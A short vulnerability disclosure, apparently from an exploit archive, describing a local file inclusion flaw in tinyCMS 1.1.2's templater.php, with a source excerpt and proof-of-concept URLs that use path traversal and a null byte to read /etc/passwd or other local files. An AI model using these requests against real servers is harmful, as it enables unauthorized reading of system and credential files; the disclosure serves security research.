tinyCMS version 1.1.2 suffers from a local file inclusion vulnerability in templater.php.
1582e2ca40a2b46e1501addfce561fc531390d74107c85fe4c7b39dd88104320
########################################################################################
#
# Name : tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
# Author : cOndemned [ Dark-Coders ]
# Greetz : Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
# Conditions : Magic quotes gpc = Off / Register Globals = On
# Other info : Prior versions probably are vulnerable too
#
########################################################################################
Source of /modules/ZZ_Templater/templater.php
[ ... ]
17. $ftemplatedir = 'templates/'.$config['template'].'/';
18. include('templates/'.$config['template'].'/data.php'); // <--- LFI
19. if($tdata['useblocks'] == 1)
[ ... ]
Proof of Concept :
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
Jusf 4 fun